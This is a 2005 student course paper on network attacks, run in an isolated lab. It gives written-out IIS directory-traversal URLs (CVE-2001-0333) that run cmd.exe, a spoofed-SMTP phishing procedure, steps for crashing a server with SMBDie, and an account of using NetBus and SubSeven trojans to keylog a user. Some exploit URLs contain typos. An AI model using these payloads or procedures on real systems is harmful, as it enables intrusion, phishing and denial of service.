Attacks Web Server, Email, DOS and Trojan Attacks | CS 5950, Papers of Computer Science

Material Type: Paper; Professor: Lilien; Class: Embedded Systems; Subject: Computer Science; University: Western Michigan University; Term: Fall 2005;

Typology: Papers

Pre 2010

Uploaded on 07/29/2009

koofers-user-1wh
koofers-user-1wh 🇺🇸

9 documents

1 / 8

Toggle sidebar

This page cannot be seen from the preview

Don't miss anything!

bg1
CS 5950-6030 NETWORK SECURITY Dr. Leszek Lilien
Abstract—In today’ s world, almost all computer s are
interconnected to one another . Though this is highly
appreciable, it also becomes a necessity to safeguard the
computer from outside attacks. The attacks could leave a
permanent or te mporary damage to the computer. In either
case a lot of time and money should be spent in fixing this
problem. The study of various security flaws helps in
understanding the possible vulnerabilities in a system and the
ways by which i t can be minimized.
Index Terms—exploit, social engineering, Trojan,
vulnerability
I. INTRODUCTION
Computers today are highly vulnerable and fall prey to
attacks from another person or system. This paper presents an
explanation on the various types of attacks and ways by
which these attacks can be prevented.
II. WEB SERVER EXPLOITS
By default all Windows 2000 servers are pre-installed with
Microsoft’s Internet Information Server (IIS). A number of
vulnerabilities have been discovered since the release of IIS
5.0 and exploits were achieved through these vulnerabilities.
A publicly available server must be maintained to retain its
confidentiality, integrity and availability.
Here we will exploit the vulnerability explained in
Common Vulnerabilities and Exposures, CVE-2001-
0333[19]. The vulnerability explains the execution of
arbitrary commands by remote attackers by encoding “..” and
“\” characters twice.
Manuscript received December, 2005. This work was supported by the
Department of Computer Science, Western Michigan University.
Amit T Arakeswara is doing his graduate studies in Computer Science at
Western Michigan University, Kalamazoo, MI-49008.
Rathna Kaliannan is doing his gr aduate studies in Electrical Engineering at
Western Michigan University, Kalamazoo, MI-49008.
Vrishal Dinar is doing his graduate studies in Computer science at Western
Michigan University, Kalamazoo, MI-49008.(email:[email protected])
A. Setup
A Windows 2000 Server is exploited with the help of a
Windows XP machine. The address of the server is typed on
the internet explorer bar of the XP machine. Let’s say
http://192.168.100.102/ is the address of the server. The page
returns the default page of the server [20].
B. The exploit
Exploit of the web server is done by typing,
http://192.168.100.102/scrips/..%255c../winnt/system32/cmd.
exe?/c+dir. In the above hyperlink, scripts are the directory
from which commands will be run. The ..%255c.. is Unicode
that is ignored by the web server but used to traverse out of
the Web root. The /winnt/system32/cmd.exe? is the
command being called and /c+dir is the option to go with the
command.
Now, the winnt directory could be viewed by adding \winnt
to the address,
http://192.168.100.102/scripts/..%244c../winnt/system32/cmd
.exe?/c+dir+\winnt.
A directory is created in the server by including the
following commands c+mkdir+\exploit in the address bar,
http://192.168.100.102/scrips/..%255c../winnt/system32/cmd.
exe?/c+dir+\. This will return an error since the command
mkdir does not return anything. When the Refresh button is
hit, it returns an error but also displays that the directory
exists.
Now a trojan or virus could be implemented onto the
directory ‘exploit’. The cmd.exe is copied onto the directory
‘exploit’ by,
http://192.168.100.102/scripts/..%255c../winnt/system32/cmd
.exe?/c+copy+\winnt\system32\cmd.exe+\exploit
Attacks-Web Server, Email, DOS and Trojan
Attacks
Amit T Arakeswara, Rathna Kaliannan, Vrishal Dinar
1
pf3
pf4
pf5
pf8

Partial preview of the text

Download Attacks Web Server, Email, DOS and Trojan Attacks | CS 5950 and more Papers Computer Science in PDF only on Docsity!

Abstract —In today’s world, almost all computers are interconnected to one another. Though this is highly appreciable, it also becomes a necessity to safeguard the computer from outside attacks. The attacks could leave a permanent or temporary damage to the computer. In either case a lot of time and money should be spent in fixing this problem. The study of various security flaws helps in understanding the possible vulnerabilities in a system and the ways by which it can be minimized. Index Terms —exploit, social engineering, Trojan, vulnerability I. INTRODUCTION Computers today are highly vulnerable and fall prey to attacks from another person or system. This paper presents an explanation on the various types of attacks and ways by which these attacks can be prevented. II. WEB SERVER EXPLOITS By default all Windows 2000 servers are pre-installed with Microsoft’s Internet Information Server (IIS). A number of vulnerabilities have been discovered since the release of IIS 5.0 and exploits were achieved through these vulnerabilities. A publicly available server must be maintained to retain its confidentiality, integrity and availability. Here we will exploit the vulnerability explained in Common Vulnerabilities and Exposures, CVE-2001- 0333[19]. The vulnerability explains the execution of arbitrary commands by remote attackers by encoding “..” and “\” characters twice. Manuscript received December, 2005. This work was supported by the Department of Computer Science, Western Michigan University. Amit T Arakeswara is doing his graduate studies in Computer Science at Western Michigan University, Kalamazoo, MI-49008. (email:[email protected]) Rathna Kaliannan is doing his graduate studies in Electrical Engineering at Western Michigan University, Kalamazoo, MI-49008. (email:[email protected]) Vrishal Dinar is doing his graduate studies in Computer science at Western Michigan University, Kalamazoo, MI-49008.(email:[email protected]) A. Setup A Windows 2000 Server is exploited with the help of a Windows XP machine. The address of the server is typed on the internet explorer bar of the XP machine. Let’s say http://192.168.100.102/ is the address of the server. The page returns the default page of the server [20]. B. The exploit Exploit of the web server is done by typing, http://192.168.100.102/scrips/..%255c../winnt/system32/cmd. exe?/c+dir. In the above hyperlink, scripts are the directory from which commands will be run. The ..%255c.. is Unicode that is ignored by the web server but used to traverse out of the Web root. The /winnt/system32/cmd.exe? is the command being called and /c+dir is the option to go with the command. Now, the winnt directory could be viewed by adding \winnt to the address, http://192.168.100.102/scripts/..%244c../winnt/system32/cmd .exe?/c+dir+\winnt. A directory is created in the server by including the following commands c+mkdir+\exploit in the address bar, http://192.168.100.102/scrips/..%255c../winnt/system32/cmd. exe?/c+dir+. This will return an error since the command mkdir does not return anything. When the Refresh button is hit, it returns an error but also displays that the directory exists. Now a trojan or virus could be implemented onto the directory ‘exploit’. The cmd.exe is copied onto the directory ‘exploit’ by, http://192.168.100.102/scripts/..%255c../winnt/system32/cmd .exe?/c+copy+\winnt\system32\cmd.exe+\exploit

Attacks-Web Server, Email, DOS and Trojan

Attacks

Amit T Arakeswara, Rathna Kaliannan, Vrishal Dinar

The cmd.exe is copied onto the ‘exploit’ directory is used to perform an exploitation. This is done by issuing the address, http://192.168.100.102/scripts/..%255c../exploit/cmd.exe?/c+ dir+\exploit. C. Verification and results The exploit is verified by checking the directory ‘exploit’ on the Windows 2000 server and the presence of cmd.exe under it. III. EMAIL SYSTEM EXPLOITS One of the most widely used applications on the internet is e-mail. Though it is a very convenient way of communication, viruses could be easily delivered with this facility. The attacker spoofs his email-address and sends it as an authentic mail from a trusted company. The user would obviously be tricked into reading this mail. If he was not aware about spoofing and phishing, he might end up downloading an executable from the email. This executable could be a trojan or a virus. This way of tricking someone into doing something they would normally not do is called social engineering. A. Exploit on a Linux client - Evolution Evolution is configured on linux client. The server is named as linuxserv.security.local. Let a user profile be created with the name ‘labuser’. On the linux client let us open Telnet by typing ‘telnet’. The ‘open’ command is issued by entering, open 192.168.100.202 25. 192.168.100.202 is the address of the server and 25 is the SMTP mail server protocol. Now a mail could be sent by issuing the following commands. mail from: [email protected]. rcpt to: [email protected] data Write the following on the program From:[email protected]. To: [email protected] Subject: Important update MIME-Version” 1. Content-type:text/html; charset=us-ascii

Important update

hI here!

Enter a “.” to complete the message. The line here! points to a reference. The reference ‘here!’ could call a file on the server that may be compromised in terms of security. This link could also be programmed to send an increment to a counter which would determine if the object has been opened by a user or not. The logs stored on the server can be accessed by typing, cat /var/log/httpd/access_log. Now when evolution is opened, the ‘labuser’ would find a mail in his or her inbox sent from [email protected]. Evolution can now be configured by specifying the host name to be linuxserv.security.local and the username is [email protected]. When we click on the check for mail button, the mail will be delivered and the person is more likely to be cheated into clicking the link. B. Exploit on Windows - Outlook Here a windows 2000 server is used with XP pro and linux server. The outlook express is configured for ‘labuser’ by choosing POP3 protocol. The incoming and outgoing mailbox is set to linuxserv.security.local. A mail with the following code is sent by initiating a telnet session as explained earlier. From: [email protected] To: [email protected] Subject: Important Update MIME-Version: 1. Content-type: text/html; charset=us-ascii

Important Updates</titles></head> <body bgcolor="#FF0000">> <h1>Important Updates</h1> You need the Important Update

 This will result in packets being sent to the victim apparently from different hosts. C. Ping Ping stands for “Packet Internet Groper”. A utility that forwards data packets to check the quality of a link or verify the connection of a machine to the Internet. It provides a basic test of whether a particular host is operating properly and is reachable on the network from the testing host. Ping provides estimates of the round-trip time and packet loss rate between hosts. It works by sending ICMP “echo request” packets to the target host and listening for replies (ICMP “echo response” packets). Steps for execution  In the command prompt type the following:  ping  This will result in giving the packet information, the round trip time etc., if the host exists in the network else this will result in operation timed out. D. SMBDie SMBDie is a tool which was created to exploit a problem with the Windows operating system and when activated, will crash and Blue Screen the server immediately SMB ( Server Message Block ) is the protocol Microsoft uses to share files, printers, serial ports, and also to communicate between computers using named pipes and mail slots. Clients make SMB requests for resources and servers make SMB responses in what described as a client server, request- response protocol. An administrator can block access to SMB on TCP ports 445 and 139 at the network perimeter. This would block access from un-trusted networks. However, legitimate users could be blocked in a ‘file and print’ networking environment. Administrators could also shut down the lanman server service. But this action would block legitimate users from using file and print services on a particular server where the lanman service had been stopped. The remedy for this is to download the patches from the following Microsoft sites based on the operating system/server installed. For Microsoft Windows 2000 it is , http://www.microsoft.com/downloads/Release.asp? ReleaseID= For Microsoft Windows XP it is, http://www.microsoft.com/downloads/Release.asp? ReleaseID= Steps for execution  Down load the SMBDie tool from http://www.windowssecurity.com  Extract the entire file in a folder and double click on the executable.  This will prompt for the ipaddress and the NETBios name of the server to be crashed.  The NETBios name can be known by executing the command nbtstat –n in the command prompt Press “ Kill ” button, you will observe that the server has crashed and blue screened immediately. E. Ethereal Ethereal is a network protocol analyzer, otherwise known as a "packet sniffer", which is a tool that captures and decodes packets of information from a network. Ethereal can capture live network traffic or read data from a file and translate the data to be presented in a format the user can understand. Network analyzers such as Ethereal are invaluable tools for administrators to diagnose and troubleshoot problems with, but are also used by intruders to obtain unauthorized information. Ethereal can be used to capture and analyze network packets and discover a wide array of information such as:  Troubleshooting network issues and locating bottlenecks  Network intrusion detection

 Log network traffic for forensic analysis  Discovering a DoS (denial-of-service) attack Steps for execution  Download Ethereal from http://www.ethereal.com  Run the executable  List all the available capture interfaces by clicking the first option from the toolbar.  Select the interface to be captured and sniff through all the packets in that interface. V TROJAN ATTACKS A computer virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents [1]. It behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. A Trojan horse is a similar kind of program, the only difference being that it is disguised as legitimate software. It is so named after the legendary ‘Trojan horse’ left on the shores of Troy by the Greeks to lull the Trojans into a false sense of belief that the war was over. We will be talking about two Trojan horse programs, hitherto referred to as ‘trojan(s)’

  1. Netbus
  2. SubSeven Netbus was one of the first ‘point and click’ types of Trojans out there creating havoc among unsuspecting victims [2]. It was created by Carl-Frederik Neikter (cf) [3]. It along with BackOrifice (© Cult of the Dead Cow), was, at one time, the lead Trojan program used by hackers/crackers to remotely access their victim’s computer. One of the most common ways for a Trojan program to get installed on a victim’s computer is when the unsuspecting user downloads and runs a ‘freeware game’ or any executable file off the internet, or from an infected removable diskette drive. Once the executable is run, however, the Trojan program (server-servicing ‘requests’ from ‘clients’ for connections) spreads through the system, replicating itself so that even if one copy gets deleted, the server will continue to function. A Netbus NetBus 1.7 has the following ‘features’ as described by its author  Keylogger  Mouse control  Upload/download/delete ANY file  Take screenshots/screendumps  Shutdown/restart Windows  Registry manager  Open browser to a specific URL  Record sounds from the mic  Ultra-fast Port scanner.  Port Redirect - redirects data to another host and port.  Server setup - configures the server-exe with some options, like TCP-port and mail notification.  Application Redirect - redirects I/O from console applications to a specified TCP-port.  Possibility to restrict access to only a few IP-numbers. In this project, we installed NetBus Pro 2.0 server on a Windows 2000 Server system, and the client was installed on a laptop running Windows XP Professional. One really good feature of NetBus is that it can sniff a local network for any current running servers and give details about them. This makes it really easy to work with as we will know the IP address of the server. I made a search for NetBus servers on our network, and connected to the server program. Once we got in, we was able to look up the entire system information of the server, the number of disk drives, the free space on each of them, their directory listing, etc… One of the first things that we did once we connected was to open the keylogger. This is a really good use as the server also doubles up as a keylogger. One of our friends, who was working with me on this project kept typing stuff on the screen and we could read each and every character, even typos! I was even able to send keys to him, making his computer believe that HE had typed those keys and not me. Another feature of NetBus that can be used to spy on an unsuspecting victim is the screenshot/screendump utility,

VI CONCLUSION

The vulnerability of Windows 2000 web server is studied and tested. It therefore becomes necessary to apply the latest security updates and patches as soon as any operating system with IIS is installed. The denial of service attacks warns the users without firewalls. The SubSeven and Netbus trojans shows how vulnerable a system could be in a networked environment. This along with email spoofing warns users to constantly scan their systems using updated anti-virus software. ACKNOWLEDGMENT We would like to thank our teacher, Dr. Leszek Lilien for his continued support all throughout this semester, and for helping us out of any speed bumps we might have faced. We would also like to thank the lab administrators in room C- for letting us continue our work in spite of all the noise and the odd timings of our operation. REFERENCES [1] http://en.wikipedia.org/wiki/Computer_virus [2] http://www.hackfix.org/netbusfix/ [3] http://www.windowsecurity.com/articles/ The_Netbus_trojan.html [4] http://www.cultdeadcow.com [5] http://www.hackfix.org/SubSeven/

[6] http://www.tcp-ip-info.de/trojaner_und_viren/ netbus_pro_eng.htm [7] http://www.hackpr.net/~sub7/ [8] http://www.hackpr.net/~sub7/faq.shtml [9] http://www.come.to/soul4blade [10] http://www.ethereal.com [11] http://www.fsf.org/ [12] http://www.gnu.org [13] http://www.gnu.org/philosophy/free-sw.html [14] http://www.windowssecurity.com.articles/ SMBDie_Crashinf_Windows_Servers_with_Ease.html [15] http://www.ss64.com/nt/nbtstat.html [16] http://insecure.org/nmap/ [17] http://www.securityfocus.com/infocus/ [18] http://www.ethereal.com/distribution/win32/ [19] http://www.cve.mitre.org/ [20] Vincent J Nestler, Wm. Arthur Conklin, Gregory B. White, Matthew P. Hirsch, “Computer Security Lab Manual”, MCGraw Hill, 2005 [21] Pfleeger and Pfleeger, Security in Computing. Third Edition , Prentice Hall PTR, 2003